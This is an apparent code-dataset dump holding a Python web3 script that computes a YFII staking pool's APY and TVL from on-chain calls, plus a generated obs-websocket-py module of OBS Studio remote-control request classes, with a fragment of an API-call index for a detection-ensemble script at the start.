| [((65, 11, 65, 37), 'pandas.read_csv', 'pd.read_csv', ({(65, 23, 65, 36): 'METADATA_PATH'}, {}), '(METADATA_PATH)', True, 'import pandas as pd\n'), ((10, 23, 10, 48), 'os.path.abspath', 'os.path.abspath', ({(10, 39, 10, 47): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((60, 14, 60, 26), 'json.load', 'json.load', ({(60, 24, 60, 25): 'f'}, {}), '(f)', False, 'import json\n'), ((63, 19, 63, 31), 'json.load', 'json.load', ({(63, 29, 63, 30): 'f'}, {}), '(f)', False, 'import json\n'), ((92, 9, 92, 51), 'os.path.join', 'os.path.join', ({(92, 22, 92, 26): 'WDIR', (92, 28, 92, 50): '"""DetectionEnsemble.py"""'}, {}), "(WDIR, 'DetectionEnsemble.py')", False, 'import os\n'), ((98, 15, 98, 44), 'numpy.unique', 'np.unique', ({(98, 25, 98, 43): 'metadata.patientId'}, {}), '(metadata.patientId)', True, 'import numpy as np\n'), ((121, 23, 128, 61), 'pandas.DataFrame', 'pd.DataFrame', ({(121, 36, 128, 60): "{'patientId': list_of_new_pids, 'x': [box[0] for box in list_of_bboxes],\n 'y': [box[1] for box in list_of_bboxes], 'w': [box[2] for box in\n list_of_bboxes], 'h': [box[3] for box in list_of_bboxes], 'score': [box\n [5] for box in list_of_bboxes], 'votes': [box[-1] for box in\n list_of_bboxes], 'bbox': list_of_bboxes}"}, {}), "({'patientId': list_of_new_pids, 'x': [box[0] for box in\n list_of_bboxes], 'y': [box[1] for box in list_of_bboxes], 'w': [box[2] for\n box in list_of_bboxes], 'h': [box[3] for box in list_of_bboxes],\n 'score': [box[5] for box in list_of_bboxes], 'votes': [box[-1] for box in\n list_of_bboxes], 'bbox': list_of_bboxes})", True, 'import pandas as pd\n'), ((158, 26, 158, 78), 'os.path.join', 'os.path.join', ({(158, 39, 158, 43): 'WDIR', (158, 45, 158, 77): '"""../../SimpleDCNPredictions.csv"""'}, {}), "(WDIR, '../../SimpleDCNPredictions.csv')", False, 'import os\n'), ((16, 15, 16, 27), 'json.load', 'json.load', ({(16, 25, 16, 26): 'f'}, {}), '(f)', False, 'import json\n'), ((147, 71, 147, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(147, 93, 147, 102): 'fold1_nom'}, {}), '(fold1_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((148, 71, 148, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(148, 93, 148, 102): 'fold3_nom'}, {}), '(fold3_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((149, 71, 149, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(149, 93, 149, 102): 'fold5_nom'}, {}), '(fold5_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((150, 71, 150, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(150, 93, 150, 102): 'fold7_nom'}, {}), '(fold7_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((151, 71, 151, 103), 'src.infer.ExtractDeformableTTA.RCNN0_DETS_DIR.format', 'RCNN0_DETS_DIR.format', ({(151, 93, 151, 102): 'fold9_nom'}, {}), '(fold9_nom)', False, 'from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR\n'), ((74, 15, 74, 43), 're.search', 're.search', ({(74, 25, 74, 32): '"""_flip"""', (74, 34, 74, 42): 'test_set'}, {}), "('_flip', test_set)", False, 'import re\n'), ((112, 39, 112, 90), 'src.infer.DetectionEnsemble.GeneralEnsemble', 
'GeneralEnsemble', (), '', False, 'from src.infer.DetectionEnsemble import GeneralEnsemble\n')] |
yfii/yfiiapi | pool4.py | 2c0341b66108f99005dc5a40e3d1d30267f50bb5 | from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| [((6, 10, 6, 29), 'web3.HTTPProvider', 'HTTPProvider', ({(6, 23, 6, 28): 'w3url'}, {}), '(w3url)', False, 'from web3 import Web3, HTTPProvider\n')] |
PanBartosz/obs-websocket-py | obswebsocket/requests.py | e92960a475d3f1096a4ea41763cbc776b23f0a37 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# THIS FILE WAS GENERATED BY generate_classes.py - DO NOT EDIT #
# (Generated on 2020-12-20 18:26:33.661372) #
from .base_classes import Baserequests
class GetVersion(Baserequests):
"""Returns the latest version of the plugin and the API.
:Returns:
*version*
type: double
OBSRemote compatible API version. Fixed to 1.1 for retrocompatibility.
*obs_websocket_version*
type: String
obs-websocket plugin version.
*obs_studio_version*
type: String
OBS Studio program version.
*available_requests*
type: String
List of available request types, formatted as a comma-separated list string (e.g. : "Method1,Method2,Method3").
*supported_image_export_formats*
type: String
List of supported formats for features that use image export (like the TakeSourceScreenshot request type) formatted as a comma-separated list string
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVersion'
self.datain['version'] = None
self.datain['obs-websocket-version'] = None
self.datain['obs-studio-version'] = None
self.datain['available-requests'] = None
self.datain['supported-image-export-formats'] = None
def getVersion(self):
return self.datain['version']
def getObsWebsocketVersion(self):
return self.datain['obs-websocket-version']
def getObsStudioVersion(self):
return self.datain['obs-studio-version']
def getAvailableRequests(self):
return self.datain['available-requests']
def getSupportedImageExportFormats(self):
return self.datain['supported-image-export-formats']
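# Illustrative usage with the obsws client from this package (host, port and
# password are placeholders):
#
#   from obswebsocket import obsws, requests
#   ws = obsws("localhost", 4444, "secret")
#   ws.connect()
#   version = ws.call(requests.GetVersion())
#   print(version.getObsWebsocketVersion())
#   ws.disconnect()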
class GetAuthRequired(Baserequests):
"""Tells the client if authentication is required. If so, returns authentication parameters `challenge`
and `salt` (see "Authentication" for more information).
:Returns:
*authRequired*
type: boolean
Indicates whether authentication is required.
*challenge*
type: String (optional)
*salt*
type: String (optional)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetAuthRequired'
self.datain['authRequired'] = None
self.datain['challenge'] = None
self.datain['salt'] = None
def getAuthRequired(self):
return self.datain['authRequired']
def getChallenge(self):
return self.datain['challenge']
def getSalt(self):
return self.datain['salt']
class Authenticate(Baserequests):
"""Attempt to authenticate the client to the server.
:Arguments:
*auth*
type: String
Response to the auth challenge (see "Authentication" for more information).
"""
def __init__(self, auth):
Baserequests.__init__(self)
self.name = 'Authenticate'
self.dataout['auth'] = auth
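# Sketch of the challenge-response flow referenced above, following the
# obs-websocket 4.x authentication scheme (the obsws client normally does
# this automatically; `ws` and `password` are the placeholders from the
# GetVersion example):
#
#   import base64, hashlib
#   auth = ws.call(requests.GetAuthRequired())
#   if auth.getAuthRequired():
#       secret = base64.b64encode(
#           hashlib.sha256((password + auth.getSalt()).encode()).digest())
#       response = base64.b64encode(
#           hashlib.sha256(secret + auth.getChallenge().encode()).digest())
#       ws.call(requests.Authenticate(response.decode()))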
class SetHeartbeat(Baserequests):
"""Enable/disable sending of the Heartbeat event
:Arguments:
*enable*
type: boolean
Starts/Stops emitting heartbeat messages
"""
def __init__(self, enable):
Baserequests.__init__(self)
self.name = 'SetHeartbeat'
self.dataout['enable'] = enable
class SetFilenameFormatting(Baserequests):
"""Set the filename formatting string
:Arguments:
*filename_formatting*
type: String
Filename formatting string to set.
"""
def __init__(self, filename_formatting):
Baserequests.__init__(self)
self.name = 'SetFilenameFormatting'
self.dataout['filename-formatting'] = filename_formatting
class GetFilenameFormatting(Baserequests):
"""Get the filename formatting string
:Returns:
*filename_formatting*
type: String
Current filename formatting string.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetFilenameFormatting'
self.datain['filename-formatting'] = None
def getFilenameFormatting(self):
return self.datain['filename-formatting']
class GetStats(Baserequests):
"""Get OBS stats (almost the same info as provided in OBS' stats window)
:Returns:
*stats*
type: OBSStats
[OBS stats](#obsstats)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStats'
self.datain['stats'] = None
def getStats(self):
return self.datain['stats']
class BroadcastCustomMessage(Baserequests):
"""Broadcast custom message to all connected WebSocket clients
:Arguments:
*realm*
type: String
            Identifier to be chosen by the client
*data*
type: Object
User-defined data
"""
def __init__(self, realm, data):
Baserequests.__init__(self)
self.name = 'BroadcastCustomMessage'
self.dataout['realm'] = realm
self.dataout['data'] = data
class GetVideoInfo(Baserequests):
"""Get basic OBS video information
:Returns:
*baseWidth*
type: int
Base (canvas) width
*baseHeight*
type: int
Base (canvas) height
*outputWidth*
type: int
Output width
*outputHeight*
type: int
Output height
*scaleType*
type: String
Scaling method used if output size differs from base size
*fps*
type: double
Frames rendered per second
*videoFormat*
type: String
Video color format
*colorSpace*
type: String
Color space for YUV
*colorRange*
type: String
Color range (full or partial)
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetVideoInfo'
self.datain['baseWidth'] = None
self.datain['baseHeight'] = None
self.datain['outputWidth'] = None
self.datain['outputHeight'] = None
self.datain['scaleType'] = None
self.datain['fps'] = None
self.datain['videoFormat'] = None
self.datain['colorSpace'] = None
self.datain['colorRange'] = None
def getBaseWidth(self):
return self.datain['baseWidth']
def getBaseHeight(self):
return self.datain['baseHeight']
def getOutputWidth(self):
return self.datain['outputWidth']
def getOutputHeight(self):
return self.datain['outputHeight']
def getScaleType(self):
return self.datain['scaleType']
def getFps(self):
return self.datain['fps']
def getVideoFormat(self):
return self.datain['videoFormat']
def getColorSpace(self):
return self.datain['colorSpace']
def getColorRange(self):
return self.datain['colorRange']
class OpenProjector(Baserequests):
"""Open a projector window or create a projector on a monitor. Requires OBS v24.0.4 or newer.
:Arguments:
*type*
type: String (Optional)
Type of projector: `Preview` (default), `Source`, `Scene`, `StudioProgram`, or `Multiview` (case insensitive).
*monitor*
type: int (Optional)
Monitor to open the projector on. If -1 or omitted, opens a window.
*geometry*
type: String (Optional)
Size and position of the projector window (only if monitor is -1). Encoded in Base64 using [Qt's geometry encoding](https://doc.qt.io/qt-5/qwidget.html#saveGeometry). Corresponds to OBS's saved projectors.
*name*
type: String (Optional)
Name of the source or scene to be displayed (ignored for other projector types).
"""
def __init__(self, type, monitor, geometry, name):
Baserequests.__init__(self)
self.name = 'OpenProjector'
self.dataout['type'] = type
self.dataout['monitor'] = monitor
self.dataout['geometry'] = geometry
self.dataout['name'] = name
class TriggerHotkeyByName(Baserequests):
"""Executes hotkey routine, identified by hotkey unique name
:Arguments:
*hotkeyName*
type: String
Unique name of the hotkey, as defined when registering the hotkey (e.g. "ReplayBuffer.Save")
"""
def __init__(self, hotkeyName):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyByName'
self.dataout['hotkeyName'] = hotkeyName
class TriggerHotkeyBySequence(Baserequests):
"""Executes hotkey routine, identified by bound combination of keys. A single key combination might trigger multiple hotkey routines depending on user settings
:Arguments:
*keyId*
type: String
Main key identifier (e.g. `OBS_KEY_A` for key "A"). Available identifiers [here](https://github.com/obsproject/obs-studio/blob/master/libobs/obs-hotkeys.h)
*keyModifiers*
type: Object (Optional)
            Optional key modifiers object. False entries can be omitted
*keyModifiers.shift*
type: boolean
Trigger Shift Key
*keyModifiers.alt*
type: boolean
Trigger Alt Key
*keyModifiers.control*
type: boolean
Trigger Control (Ctrl) Key
*keyModifiers.command*
type: boolean
Trigger Command Key (Mac)
"""
def __init__(self, keyId, keyModifiers):
Baserequests.__init__(self)
self.name = 'TriggerHotkeyBySequence'
self.dataout['keyId'] = keyId
self.dataout['keyModifiers'] = keyModifiers
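# Illustrative call (key and modifier names follow the docstring above;
# `ws` is a connected obsws client): trigger Ctrl+Shift+S inside OBS:
#   ws.call(requests.TriggerHotkeyBySequence(
#       'OBS_KEY_S', {'control': True, 'shift': True}))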
class PlayPauseMedia(Baserequests):
"""Pause or play a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*playPause*
type: boolean
Whether to pause or play the source. `false` for play, `true` for pause.
"""
def __init__(self, sourceName, playPause):
Baserequests.__init__(self)
self.name = 'PlayPauseMedia'
self.dataout['sourceName'] = sourceName
self.dataout['playPause'] = playPause
class RestartMedia(Baserequests):
"""Restart a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'RestartMedia'
self.dataout['sourceName'] = sourceName
class StopMedia(Baserequests):
"""Stop a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'StopMedia'
self.dataout['sourceName'] = sourceName
class NextMedia(Baserequests):
"""Skip to the next media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'NextMedia'
self.dataout['sourceName'] = sourceName
class PreviousMedia(Baserequests):
"""Go to the previous media item in the playlist. Supports only vlc media source (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'PreviousMedia'
self.dataout['sourceName'] = sourceName
class GetMediaDuration(Baserequests):
"""Get the length of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: For some reason, for the first 5 or so seconds that the media is playing, the total duration can be off by upwards of 50ms.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaDuration*
type: int
The total length of media in milliseconds..
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaDuration'
self.datain['mediaDuration'] = None
self.dataout['sourceName'] = sourceName
def getMediaDuration(self):
return self.datain['mediaDuration']
class GetMediaTime(Baserequests):
"""Get the current timestamp of media in milliseconds. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*timestamp*
type: int
The time in milliseconds since the start of the media.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaTime'
self.datain['timestamp'] = None
self.dataout['sourceName'] = sourceName
def getTimestamp(self):
return self.datain['timestamp']
class SetMediaTime(Baserequests):
"""Set the timestamp of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
*timestamp*
type: int
Milliseconds to set the timestamp to.
"""
def __init__(self, sourceName, timestamp):
Baserequests.__init__(self)
self.name = 'SetMediaTime'
self.dataout['sourceName'] = sourceName
self.dataout['timestamp'] = timestamp
class ScrubMedia(Baserequests):
"""Scrub media using a supplied offset. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
Note: Due to processing/network delays, this request is not perfect. The processing rate of this request has also not been tested.
:Arguments:
*sourceName*
type: String
Source name.
*timeOffset*
type: int
Millisecond offset (positive or negative) to offset the current media position.
"""
def __init__(self, sourceName, timeOffset):
Baserequests.__init__(self)
self.name = 'ScrubMedia'
self.dataout['sourceName'] = sourceName
self.dataout['timeOffset'] = timeOffset
class GetMediaState(Baserequests):
"""Get the current playing state of a media source. Supports ffmpeg and vlc media sources (as of OBS v25.0.8)
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*mediaState*
type: String
The media state of the provided source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetMediaState'
self.datain['mediaState'] = None
self.dataout['sourceName'] = sourceName
def getMediaState(self):
return self.datain['mediaState']
class GetMediaSourcesList(Baserequests):
"""List the media state of all media sources (vlc and media source)
:Returns:
*mediaSources*
type: Array<Object>
Array of sources
*mediaSources.*.sourceName*
type: String
Unique source name
*mediaSources.*.sourceKind*
type: String
Unique source internal type (a.k.a `ffmpeg_source` or `vlc_source`)
*mediaSources.*.mediaState*
type: String
The current state of media for that source. States: `none`, `playing`, `opening`, `buffering`, `paused`, `stopped`, `ended`, `error`, `unknown`
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetMediaSourcesList'
self.datain['mediaSources'] = None
def getMediaSources(self):
return self.datain['mediaSources']
class CreateSource(Baserequests):
"""Create a source and add it as a sceneitem to a scene.
:Arguments:
*sourceName*
type: String
Source name.
*sourceKind*
type: String
Source kind, Eg. `vlc_source`.
*sceneName*
type: String
Scene to add the new source to.
*sourceSettings*
type: Object (optional)
Source settings data.
*setVisible*
type: boolean (optional)
Set the created SceneItem as visible or not. Defaults to true
:Returns:
*itemId*
type: int
ID of the SceneItem in the scene.
"""
def __init__(self, sourceName, sourceKind, sceneName, sourceSettings=None, setVisible=None):
Baserequests.__init__(self)
self.name = 'CreateSource'
self.datain['itemId'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceKind'] = sourceKind
self.dataout['sceneName'] = sceneName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
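# Illustrative call (`ws` is a connected obsws client; the scene name, file
# path and settings keys are placeholders that depend on the source kind):
#   item_id = ws.call(requests.CreateSource(
#       'My clip', 'ffmpeg_source', 'Scene',
#       sourceSettings={'local_file': '/path/to/clip.mp4'})).getItemId()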
class GetSourcesList(Baserequests):
"""List all sources available in the running OBS instance
:Returns:
*sources*
type: Array<Object>
Array of sources
*sources.*.name*
type: String
Unique source name
*sources.*.typeId*
type: String
Non-unique source internal type (a.k.a kind)
*sources.*.type*
type: String
Source type. Value is one of the following: "input", "filter", "transition", "scene" or "unknown"
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourcesList'
self.datain['sources'] = None
def getSources(self):
return self.datain['sources']
class GetSourceTypesList(Baserequests):
"""Get a list of all available sources types
:Returns:
*types*
type: Array<Object>
Array of source types
*types.*.typeId*
type: String
Non-unique internal source type ID
*types.*.displayName*
type: String
Display name of the source type
*types.*.type*
type: String
Type. Value is one of the following: "input", "filter", "transition" or "other"
*types.*.defaultSettings*
type: Object
Default settings of this source type
*types.*.caps*
type: Object
Source type capabilities
*types.*.caps.isAsync*
type: Boolean
True if source of this type provide frames asynchronously
*types.*.caps.hasVideo*
type: Boolean
True if sources of this type provide video
*types.*.caps.hasAudio*
type: Boolean
True if sources of this type provide audio
*types.*.caps.canInteract*
type: Boolean
True if interaction with this sources of this type is possible
*types.*.caps.isComposite*
type: Boolean
True if sources of this type composite one or more sub-sources
*types.*.caps.doNotDuplicate*
type: Boolean
True if sources of this type should not be fully duplicated
*types.*.caps.doNotSelfMonitor*
type: Boolean
            True if sources of this type may cause a feedback loop if its audio is monitored and shouldn't be
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSourceTypesList'
self.datain['types'] = None
def getTypes(self):
return self.datain['types']
class GetVolume(Baserequests):
"""Get the volume of the specified source. Default response uses mul format, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*useDecibel*
type: boolean (optional)
Output volume in decibels of attenuation instead of amplitude/mul.
:Returns:
*name*
type: String
Source name.
*volume*
type: double
Volume of the source. Between `0.0` and `20.0` if using mul, under `26.0` if using dB.
*muted*
type: boolean
Indicates whether the source is muted.
"""
def __init__(self, source, useDecibel=None):
Baserequests.__init__(self)
self.name = 'GetVolume'
self.datain['name'] = None
self.datain['volume'] = None
self.datain['muted'] = None
self.dataout['source'] = source
self.dataout['useDecibel'] = useDecibel
def getName(self):
return self.datain['name']
def getVolume(self):
return self.datain['volume']
def getMuted(self):
return self.datain['muted']
class SetVolume(Baserequests):
"""Set the volume of the specified source. Default request format uses mul, NOT SLIDER PERCENTAGE.
:Arguments:
*source*
type: String
Source name.
*volume*
type: double
Desired volume. Must be between `0.0` and `20.0` for mul, and under 26.0 for dB. OBS will interpret dB values under -100.0 as Inf. Note: The OBS volume sliders only reach a maximum of 1.0mul/0.0dB, however OBS actually supports larger values.
*useDecibel*
type: boolean (optional)
            Interpret `volume` data as decibels instead of amplitude/mul.
"""
def __init__(self, source, volume, useDecibel=None):
Baserequests.__init__(self)
self.name = 'SetVolume'
self.dataout['source'] = source
self.dataout['volume'] = volume
self.dataout['useDecibel'] = useDecibel
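# Illustrative calls (`ws` is a connected obsws client, the source name is a
# placeholder): roughly the same level set as an amplitude multiplier and in
# decibels (0.5 mul ~= -6 dB):
#   ws.call(requests.SetVolume('Mic/Aux', 0.5))
#   ws.call(requests.SetVolume('Mic/Aux', -6.0, useDecibel=True))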
class GetMute(Baserequests):
"""Get the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*muted*
type: boolean
Mute status of the source.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetMute'
self.datain['name'] = None
self.datain['muted'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getMuted(self):
return self.datain['muted']
class SetMute(Baserequests):
"""Sets the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
*mute*
type: boolean
Desired mute status.
"""
def __init__(self, source, mute):
Baserequests.__init__(self)
self.name = 'SetMute'
self.dataout['source'] = source
self.dataout['mute'] = mute
class ToggleMute(Baserequests):
"""Inverts the mute status of a specified source.
:Arguments:
*source*
type: String
Source name.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'ToggleMute'
self.dataout['source'] = source
class GetAudioActive(Baserequests):
"""Get the audio's active status of a specified source.
:Arguments:
*sourceName*
type: String
Source name.
:Returns:
*audioActive*
type: boolean
Audio active status of the source.
"""
def __init__(self, sourceName):
Baserequests.__init__(self)
self.name = 'GetAudioActive'
self.datain['audioActive'] = None
self.dataout['sourceName'] = sourceName
def getAudioActive(self):
return self.datain['audioActive']
class SetSourceName(Baserequests):
"""
Note: If the new name already exists as a source, obs-websocket will return an error.
:Arguments:
*sourceName*
type: String
Source name.
*newName*
type: String
New source name.
"""
def __init__(self, sourceName, newName):
Baserequests.__init__(self)
self.name = 'SetSourceName'
self.dataout['sourceName'] = sourceName
self.dataout['newName'] = newName
class SetSyncOffset(Baserequests):
"""Set the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
*offset*
type: int
The desired audio sync offset (in nanoseconds).
"""
def __init__(self, source, offset):
Baserequests.__init__(self)
self.name = 'SetSyncOffset'
self.dataout['source'] = source
self.dataout['offset'] = offset
class GetSyncOffset(Baserequests):
"""Get the audio sync offset of a specified source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*name*
type: String
Source name.
*offset*
type: int
The audio sync offset (in nanoseconds).
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetSyncOffset'
self.datain['name'] = None
self.datain['offset'] = None
self.dataout['source'] = source
def getName(self):
return self.datain['name']
def getOffset(self):
return self.datain['offset']
class GetSourceSettings(Baserequests):
"""Get settings of the specified source
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking if you expect a specific settings schema.
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
"""
def __init__(self, sourceName, sourceType=None):
Baserequests.__init__(self)
self.name = 'GetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
class SetSourceSettings(Baserequests):
"""Set settings of the specified source.
:Arguments:
*sourceName*
type: String
Source name.
*sourceType*
type: String (optional)
Type of the specified source. Useful for type-checking to avoid settings a set of settings incompatible with the actual source's type.
*sourceSettings*
type: Object
Source settings (varies between source types, may require some probing around).
:Returns:
*sourceName*
type: String
Source name
*sourceType*
type: String
Type of the specified source
*sourceSettings*
type: Object
Updated source settings
"""
def __init__(self, sourceName, sourceSettings, sourceType=None):
Baserequests.__init__(self)
self.name = 'SetSourceSettings'
self.datain['sourceName'] = None
self.datain['sourceType'] = None
self.datain['sourceSettings'] = None
self.dataout['sourceName'] = sourceName
self.dataout['sourceSettings'] = sourceSettings
self.dataout['sourceType'] = sourceType
def getSourceName(self):
return self.datain['sourceName']
def getSourceType(self):
return self.datain['sourceType']
def getSourceSettings(self):
return self.datain['sourceSettings']
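# Illustrative sketch: a read-modify-write round trip with GetSourceSettings and
# SetSourceSettings. The settings schema varies per source type, so the
# 'local_file' key below is only a hypothetical example, not guaranteed by the
# protocol. Assumes the external `ws` client described earlier.
def _example_update_source_settings(ws, source_name, new_path):
    info = ws.call(GetSourceSettings(source_name))
    settings = info.getSourceSettings()
    settings['local_file'] = new_path  # hypothetical key for a media-style source
    updated = ws.call(SetSourceSettings(source_name, settings))
    return updated.getSourceSettings()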
class GetTextGDIPlusProperties(Baserequests):
"""Get the current properties of a Text GDI Plus source.
:Arguments:
*source*
type: String
Source name.
:Returns:
*source*
type: String
Source name.
*align*
type: String
Text Alignment ("left", "center", "right").
*bk_color*
type: int
Background color.
*bk_opacity*
type: int
Background opacity (0-100).
*chatlog*
type: boolean
Chat log.
*chatlog_lines*
type: int
Chat log lines.
*color*
type: int
Text color.
*extents*
type: boolean
Extents wrap.
*extents_cx*
type: int
Extents cx.
*extents_cy*
type: int
Extents cy.
*file*
type: String
File path name.
*read_from_file*
type: boolean
Read text from the specified file.
*font*
type: Object
Holds data for the font. Ex: `"font": { "face": "Arial", "flags": 0, "size": 150, "style": "" }`
*font.face*
type: String
Font face.
*font.flags*
type: int
Font text styling flag. `Bold=1, Italic=2, Bold Italic=3, Underline=5, Strikeout=8`
*font.size*
type: int
Font text size.
*font.style*
type: String
Font Style (unknown function).
*gradient*
type: boolean
Gradient enabled.
*gradient_color*
type: int
Gradient color.
*gradient_dir*
type: float
Gradient direction.
*gradient_opacity*
type: int
Gradient opacity (0-100).
*outline*
type: boolean
Outline.
*outline_color*
type: int
Outline color.
*outline_size*
type: int
Outline size.
*outline_opacity*
type: int
Outline opacity (0-100).
*text*
type: String
Text content to be displayed.
*valign*
type: String
Text vertical alignment ("top", "center", "bottom").
*vertical*
type: boolean
Vertical text enabled.
"""
def __init__(self, source):
Baserequests.__init__(self)
self.name = 'GetTextGDIPlusProperties'
self.datain['source'] = None
self.datain['align'] = None
self.datain['bk_color'] = None
self.datain['bk_opacity'] = None
self.datain['chatlog'] = None
self.datain['chatlog_lines'] = None
self.datain['color'] = None
self.datain['extents'] = None
self.datain['extents_cx'] = None
self.datain['extents_cy'] = None
self.datain['file'] = None
self.datain['read_from_file'] = None
self.datain['font'] = None
self.datain['gradient'] = None
self.datain['gradient_color'] = None
self.datain['gradient_dir'] = None
self.datain['gradient_opacity'] = None
self.datain['outline'] = None
self.datain['outline_color'] = None
self.datain['outline_size'] = None
self.datain['outline_opacity'] = None
self.datain['text'] = None
self.datain['valign'] = None
self.datain['vertical'] = None
self.dataout['source'] = source
def getSource(self):
return self.datain['source']
def getAlign(self):
return self.datain['align']
def getBk_color(self):
return self.datain['bk_color']
def getBk_opacity(self):
return self.datain['bk_opacity']
def getChatlog(self):
return self.datain['chatlog']
def getChatlog_lines(self):
return self.datain['chatlog_lines']
def getColor(self):
return self.datain['color']
def getExtents(self):
return self.datain['extents']
def getExtents_cx(self):
return self.datain['extents_cx']
def getExtents_cy(self):
return self.datain['extents_cy']
def getFile(self):
return self.datain['file']
def getRead_from_file(self):
return self.datain['read_from_file']
def getFont(self):
return self.datain['font']
